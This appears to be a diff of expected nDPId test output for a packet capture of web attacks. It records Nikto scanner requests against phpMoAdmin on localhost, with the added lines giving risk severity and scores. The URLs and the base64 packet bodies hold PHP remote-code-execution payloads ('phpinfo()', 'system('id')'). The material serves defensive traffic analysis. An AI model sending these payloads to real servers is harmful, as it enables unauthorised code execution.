 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
